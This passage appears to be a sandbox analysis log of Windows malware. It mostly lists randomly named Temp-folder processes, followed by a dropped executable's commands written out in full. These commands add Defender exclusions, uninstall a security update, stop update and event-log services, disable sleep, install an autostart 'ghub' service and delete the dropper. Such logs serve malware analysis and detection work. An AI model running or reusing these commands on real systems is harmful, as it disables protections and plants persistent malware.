    "C:\Users\Admin\AppData\Local\Temp\硄㔸坺究㝮䐴b"
    3⤵
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\䑇圵湶㝆㌴䕶㕸䝄
    "C:\Users\Admin\AppData\Local\Temp\䑇圵湶㝆㌴䕶㕸䝄"
    3⤵
    PID:1692
- - C:\Users\Admin\AppData\Local\Temp\䑇圵湶㝆㌴䕶㕸䝄
    "C:\Users\Admin\AppData\Local\Temp\䑇圵湶㝆㌴䕶㕸䝄"
    3⤵
    PID:1480
- - C:\Users\Admin\AppData\Local\Temp\䑮坶㕑瘸䕇㝇㍮确砷n
    "C:\Users\Admin\AppData\Local\Temp\䑮坶㕑瘸䕇㝇㍮确砷n"
    3⤵
    PID:924
- - C:\Users\Admin\AppData\Local\Temp\㡅䕇㍅确扸坸
    "C:\Users\Admin\AppData\Local\Temp\㡅䕇㍅确扸坸"
    3⤵
    PID:2148
- - C:\Users\Admin\AppData\Local\Temp\㡆空䙇圳穄兄䙑㡮
    "C:\Users\Admin\AppData\Local\Temp\㡆空䙇圳穄兄䙑㡮"
    3⤵
    PID:1832
- - C:\Users\Admin\AppData\Local\Temp\㡮砶䐵扄㔸㘸䕣㙄瘷v
    "C:\Users\Admin\AppData\Local\Temp\㡮砶䐵扄㔸㘸䕣㙄瘷v"
    3⤵
    PID:2928
- - C:\Users\Admin\AppData\Local\Temp\䕗据圸䘷䙗充
    "C:\Users\Admin\AppData\Local\Temp\䕗据圸䘷䙗充"
    3⤵
    PID:2704
- - C:\Users\Admin\AppData\Local\Temp\䕄㌳兇坢圶渷坶c
    "C:\Users\Admin\AppData\Local\Temp\䕄㌳兇坢圶渷坶c"
    3⤵
    PID:2668
- - C:\Users\Admin\AppData\Local\Temp\㝢㑸戵㑇瘴㕑湗癑渷x
    "C:\Users\Admin\AppData\Local\Temp\㝢㑸戵㑇瘴㕑湗癑渷x"
    3⤵
    PID:2792
- - C:\Users\Admin\AppData\Local\Temp\㝑㐸瘸䝺㡶渵
    "C:\Users\Admin\AppData\Local\Temp\㝑㐸瘸䝺㡶渵"
    3⤵
    PID:532
- - C:\Users\Admin\AppData\Local\Temp\兄㕑硣㝑㑆㑢癅Q
    "C:\Users\Admin\AppData\Local\Temp\兄㕑硣㝑㑆㑢癅Q"
    3⤵
    PID:1516
- - C:\Users\Admin\AppData\Local\Temp\其儴穢㔴䑺㌳硢㡣㡮8
    "C:\Users\Admin\AppData\Local\Temp\其儴穢㔴䑺㌳硢㡣㡮8"
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Local\Temp\㙮坆䕗䝣湅癣
    "C:\Users\Admin\AppData\Local\Temp\㙮坆䕗䝣湅癣"
    3⤵
    PID:1772
- - C:\Users\Admin\AppData\Local\Temp\㙅䕺坆㡄硑㍆穮c
    "C:\Users\Admin\AppData\Local\Temp\㙅䕺坆㡄硑㍆穮c"
    3⤵
    PID:2196
- - C:\Users\Admin\AppData\Local\Temp\湣穗渳㘶㘵䝺㝄湑确
    "C:\Users\Admin\AppData\Local\Temp\湣穗渳㘶㘵䝺㝄湑确"
    3⤵
    PID:1968
- - C:\Users\Admin\AppData\Local\Temp\湮砵瘶换䝢捅
    "C:\Users\Admin\AppData\Local\Temp\湮砵瘶换䝢捅"
    3⤵
    PID:272
- - C:\Users\Admin\AppData\Local\Temp\湗砳捆穸圳䜷㕆Q
    "C:\Users\Admin\AppData\Local\Temp\湗砳捆穸圳䜷㕆Q"
    3⤵
    PID:2152
- - C:\Users\Admin\AppData\Local\Temp\湗砳捆穸圳䜷㕆Q
    "C:\Users\Admin\AppData\Local\Temp\湗砳捆穸圳䜷㕆Q"
    3⤵
    PID:2684
- - C:\Users\Admin\AppData\Local\Temp\㑸㍸稴湗扣䙑㍑硣扮
    "C:\Users\Admin\AppData\Local\Temp\㑸㍸稴湗扣䙑㍑硣扮"
    3⤵
    PID:564
- - C:\Users\Admin\AppData\Local\Temp\㑸㍸稴湗扣䙑㍑硣扮
    "C:\Users\Admin\AppData\Local\Temp\㑸㍸稴湗扣䙑㍑硣扮"
    3⤵
    PID:896
- - C:\Users\Admin\AppData\Local\Temp\㕢㍅㠶瘵空5
    "C:\Users\Admin\AppData\Local\Temp\㕢㍅㠶瘵空5"
    3⤵
    PID:2980
- - C:\Users\Admin\AppData\Local\Temp\㕢㍅㠶瘵空5
    "C:\Users\Admin\AppData\Local\Temp\㕢㍅㠶瘵空5"
    3⤵
    PID:2716
- - C:\Users\Admin\AppData\Local\Temp\扑㐷㙺䕶㕅䑢䝑v
    "C:\Users\Admin\AppData\Local\Temp\扑㐷㙺䕶㕅䑢䝑v"
    3⤵
    PID:2744
- - C:\Users\Admin\AppData\Local\Temp\扸儴㕶兆䘷䔳䑇块儳
    "C:\Users\Admin\AppData\Local\Temp\扸儴㕶兆䘷䔳䑇块儳"
    3⤵
    PID:2676
- - C:\Users\Admin\AppData\Local\Temp\㍶兣㍑㌷兑c
    "C:\Users\Admin\AppData\Local\Temp\㍶兣㍑㌷兑c"
    3⤵
    PID:2664
- - C:\Users\Admin\AppData\Local\Temp\㍑坆䝅䑮挵䕆均
    "C:\Users\Admin\AppData\Local\Temp\㍑坆䝅䑮挵䕆均"
    3⤵
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\㍑坆䝅䑮挵䕆均
    "C:\Users\Admin\AppData\Local\Temp\㍑坆䝅䑮挵䕆均"
    3⤵
    PID:696
- - C:\Users\Admin\AppData\Local\Temp\捺㠸硇㘳㝢坺㙅癶䔳
    "C:\Users\Admin\AppData\Local\Temp\捺㠸硇㘳㝢坺㙅癶䔳"
    3⤵
    PID:1472
- - C:\Users\Admin\AppData\Local\Temp\癣稵㡑㍸㍣E
    "C:\Users\Admin\AppData\Local\Temp\癣稵㡑㍸㍣E"
    3⤵
    PID:3020
- - C:\Users\Admin\AppData\Local\Temp\䝮穢㝅穗䕄圷扅
    "C:\Users\Admin\AppData\Local\Temp\䝮穢㝅穗䕄圷扅"
    3⤵
    PID:2132
- - C:\Users\Admin\AppData\Local\Temp\䜸䝇㕇㜵戸湑㌴䐸3
    "C:\Users\Admin\AppData\Local\Temp\䜸䝇㕇㜵戸湑㌴䐸3"
    3⤵
    PID:2248
- - C:\Users\Admin\AppData\Local\Temp\䝣㍅㐵癇穗5
    "C:\Users\Admin\AppData\Local\Temp\䝣㍅㐵癇穗5"
    3⤵
    PID:324
- - C:\Users\Admin\AppData\Local\Temp\硢㌶䜸砸㘶湮稴
    "C:\Users\Admin\AppData\Local\Temp\硢㌶䜸砸㘶湮稴"
    3⤵
    PID:2604
- - C:\Users\Admin\AppData\Local\Temp\挷㑮䙸兑䜴戴䕆湢x
    "C:\Users\Admin\AppData\Local\Temp\挷㑮䙸兑䜴戴䕆湢x"
    3⤵
    PID:2356
- - C:\Users\Admin\AppData\Local\Temp\䙶兄块䙣癇扇㙆
    "C:\Users\Admin\AppData\Local\Temp\䙶兄块䙣癇扇㙆"
    3⤵
    PID:1520
- - C:\Users\Admin\AppData\Local\Temp\空㡑㕢㐶㑄
    "C:\Users\Admin\AppData\Local\Temp\空㡑㕢㐶㑄"
    3⤵
    PID:2860
- - C:\Users\Admin\AppData\Local\Temp\䕣稴㍗䙢䑗挸䜶
    "C:\Users\Admin\AppData\Local\Temp\䕣稴㍗䙢䑗挸䜶"
    3⤵
    PID:2800
- - C:\Users\Admin\AppData\Local\Temp\䐶穇䙆㝇渶硗砳坢x
    "C:\Users\Admin\AppData\Local\Temp\䐶穇䙆㝇渶硗砳坢x"
    3⤵
    PID:2576
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:3052
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1216
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2936
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2176
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2480
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1268
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2360
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2300
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2236
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2812
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2368
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2656
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2116
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2848
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2296
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2128
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2944
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2904
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2736
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:2216
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1600
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1464
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1592
- - C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确
    "C:\Users\Admin\AppData\Local\Temp\㠸䝺䐴㔸确"
    3⤵
    PID:1568
- - C:\Users\Admin\AppData\Local\Temp\㡣䝗圶硑㘴确3
    "C:\Users\Admin\AppData\Local\Temp\㡣䝗圶硑㘴确3"
    3⤵
    PID:1612
- - C:\Users\Admin\AppData\Local\Temp\㡣䝗圶硑㘴确3
    "C:\Users\Admin\AppData\Local\Temp\㡣䝗圶硑㘴确3"
    3⤵
    PID:1864
- - C:\Users\Admin\AppData\Local\Temp\㠵㌶兺㡶䝶稴㜸発z
    "C:\Users\Admin\AppData\Local\Temp\㠵㌶兺㡶䝶稴㜸発z"
    3⤵
    PID:1268
- - C:\Users\Admin\AppData\Local\Temp\圷渳扶扄䕇
    "C:\Users\Admin\AppData\Local\Temp\圷渳扶扄䕇"
    3⤵
    PID:2300
- - C:\Users\Admin\AppData\Local\Temp\坸湸癮挷扅穇8
    "C:\Users\Admin\AppData\Local\Temp\坸湸癮挷扅穇8"
    3⤵
    PID:1144
- - C:\Users\Admin\AppData\Local\Temp\㜴兄硺坮稷㡸㌵䐶
    "C:\Users\Admin\AppData\Local\Temp\㜴兄硺坮稷㡸㌵䐶"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\㜷㝑究渳㕑
    "C:\Users\Admin\AppData\Local\Temp\㜷㝑究渳㕑"
    3⤵
    PID:1456
- - C:\Users\Admin\AppData\Local\Temp\㜷㝑究渳㕑
    "C:\Users\Admin\AppData\Local\Temp\㜷㝑究渳㕑"
    3⤵
    PID:1956
- - C:\Users\Admin\AppData\Local\Temp\兺㠴㝑䝺䘵㜸5
    "C:\Users\Admin\AppData\Local\Temp\兺㠴㝑䝺䘵㜸5"
    3⤵
    PID:576
- - C:\Users\Admin\AppData\Local\Temp\儳㡣坅䕗兢㙗䑸湸
    "C:\Users\Admin\AppData\Local\Temp\儳㡣坅䕗兢㙗䑸湸"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\儳㡣坅䕗兢㙗䑸湸
    "C:\Users\Admin\AppData\Local\Temp\儳㡣坅䕗兢㙗䑸湸"
    3⤵
    PID:2108
- - C:\Users\Admin\AppData\Local\Temp\㔶穆湇㔵捣
    "C:\Users\Admin\AppData\Local\Temp\㔶穆湇㔵捣"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\㔸䝗瘵䝶㝆㙮x
    "C:\Users\Admin\AppData\Local\Temp\㔸䝗瘵䝶㝆㙮x"
    3⤵
    PID:608
- - C:\Users\Admin\AppData\Local\Temp\渳䜵挸㡄㍺㔴渷䜶
    "C:\Users\Admin\AppData\Local\Temp\渳䜵挸㡄㍺㔴渷䜶"
    3⤵
    PID:2100
- - C:\Users\Admin\AppData\Local\Temp\渵㍢穸㘷䕅湶癣硸扺b
    "C:\Users\Admin\AppData\Local\Temp\渵㍢穸㘷䕅湶癣硸扺b"
    3⤵
    PID:3068
- - C:\Users\Admin\AppData\Local\Temp\渷扇㠵据渷㔳7
    "C:\Users\Admin\AppData\Local\Temp\渷扇㠵据渷㔳7"
    3⤵
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\渷扇㠵据渷㔳7
    "C:\Users\Admin\AppData\Local\Temp\渷扇㠵据渷㔳7"
    3⤵
    PID:2296
- - C:\Users\Admin\AppData\Local\Temp\㑸湅㘸穸砵扣捶坸
    "C:\Users\Admin\AppData\Local\Temp\㑸湅㘸穸砵扣捶坸"
    3⤵
    PID:2124
- - C:\Users\Admin\AppData\Local\Temp\㑸湅㘸穸砵扣捶坸
    "C:\Users\Admin\AppData\Local\Temp\㑸湅㘸穸砵扣捶坸"
    3⤵
    PID:2944
- - C:\Users\Admin\AppData\Local\Temp\㐴渷㕸湅㙢癆稸㘷兺c
    "C:\Users\Admin\AppData\Local\Temp\㐴渷㕸湅㙢癆稸㘷兺c"
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Local\Temp\瘷㝮㍢瘶䜳㍺
    "C:\Users\Admin\AppData\Local\Temp\瘷㝮㍢瘶䜳㍺"
    3⤵
    PID:2176
- - C:\Users\Admin\AppData\Local\Temp\扺㠳䝗䑢坣癅㝺㐷
    "C:\Users\Admin\AppData\Local\Temp\扺㠳䝗䑢坣癅㝺㐷"
    3⤵
    PID:2620
- - C:\Users\Admin\AppData\Local\Temp\㌴㡆硆兆癆挷兢癣䕺z
    "C:\Users\Admin\AppData\Local\Temp\㌴㡆硆兆癆挷兢癣䕺z"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\㌴㡆硆兆癆挷兢癣䕺z
    "C:\Users\Admin\AppData\Local\Temp\㌴㡆硆兆癆挷兢癣䕺z"
    3⤵
    PID:2072
- - C:\Users\Admin\AppData\Local\Temp\㌶䘸㠳㌸㠸䝑
    "C:\Users\Admin\AppData\Local\Temp\㌶䘸㠳㌸㠸䝑"
    3⤵
    PID:2660
- - C:\Users\Admin\AppData\Local\Temp\挸䙑㜶䑑㐶挵㑮c
    "C:\Users\Admin\AppData\Local\Temp\挸䙑㜶䑑㐶挵㑮c"
    3⤵
    PID:2796
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:1992
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2392
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2760
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2392
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7
    "C:\Users\Admin\AppData\Local\Temp\挳䝢㕆㘴䑮硢癸㠷䙗7"
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2128
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2736
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2480
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2204
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2232
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2232
- - C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳
    "C:\Users\Admin\AppData\Local\Temp\䘵癇㐴㍸渴䐳"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\䜸扺䜶穅硶穣䑣7
    "C:\Users\Admin\AppData\Local\Temp\䜸扺䜶穅硶穣䑣7"
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\䝇湅䙺㜶㝇㡆㡑㐳㑗Q
    "C:\Users\Admin\AppData\Local\Temp\䝇湅䙺㜶㝇㡆㡑㐳㑗Q"
    3⤵
    PID:2368
- - C:\Users\Admin\AppData\Local\Temp\破㙮䕶癇㍄䕺
    "C:\Users\Admin\AppData\Local\Temp\破㙮䕶癇㍄䕺"
    3⤵
    PID:2728
- - C:\Users\Admin\AppData\Local\Temp\砷㜳坮硺䔸㡅兗4
    "C:\Users\Admin\AppData\Local\Temp\砷㜳坮硺䔸㡅兗4"
    3⤵
    PID:1312
- - C:\Users\Admin\AppData\Local\Temp\砷㜳坮硺䔸㡅兗4
    "C:\Users\Admin\AppData\Local\Temp\砷㜳坮硺䔸㡅兗4"
    3⤵
    PID:2780
- - C:\Users\Admin\AppData\Local\Temp\䑆㝸湅兗扗㜷㕶砸㙗
    "C:\Users\Admin\AppData\Local\Temp\䑆㝸湅兗扗㜷㕶砸㙗"
    3⤵
    PID:1992
- - C:\Users\Admin\AppData\Local\Temp\䘴㡄扇戵稶坑
    "C:\Users\Admin\AppData\Local\Temp\䘴㡄扇戵稶坑"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\稶䑑㌵䙣㕮㜵捶8
    "C:\Users\Admin\AppData\Local\Temp\稶䑑㌵䙣㕮㜵捶8"
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\稶䑑㌵䙣㕮㜵捶8
    "C:\Users\Admin\AppData\Local\Temp\稶䑑㌵䙣㕮㜵捶8"
    3⤵
    PID:2236
- - C:\Users\Admin\AppData\Local\Temp\穄䘴䙅坄䙶㕢䙅㘴䐵
    "C:\Users\Admin\AppData\Local\Temp\穄䘴䙅坄䙶㕢䙅㘴䐵"
    3⤵
    PID:2432
- - C:\Users\Admin\AppData\Local\Temp\䔳䝶䑇㐷兇3
    "C:\Users\Admin\AppData\Local\Temp\䔳䝶䑇㐷兇3"
    3⤵
    PID:2656
- C:\Users\Admin\AppData\Roaming\fdsiojfoidfijo.exe
  C:\Users\Admin\AppData\Roaming\fdsiojfoidfijo.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2828
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:820
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2460
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:668
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2692
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2504
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "ghub"
    3⤵
    - Launches sc.exe
    PID:692
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "ghub" binpath= "C:\ProgramData\bnmabkttxedp\ghub.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1984
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1312
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ghub"
    3⤵
    - Launches sc.exe
    PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\fdsiojfoidfijo.exe"
    3⤵
    PID:2936
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3024

C:\ProgramData\bnmabkttxedp\ghub.exe
C:\ProgramData\bnmabkttxedp\ghub.exe
1⤵
PID:2172
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:940
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2232
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2248
- C:\Windows\system32\sc.exe
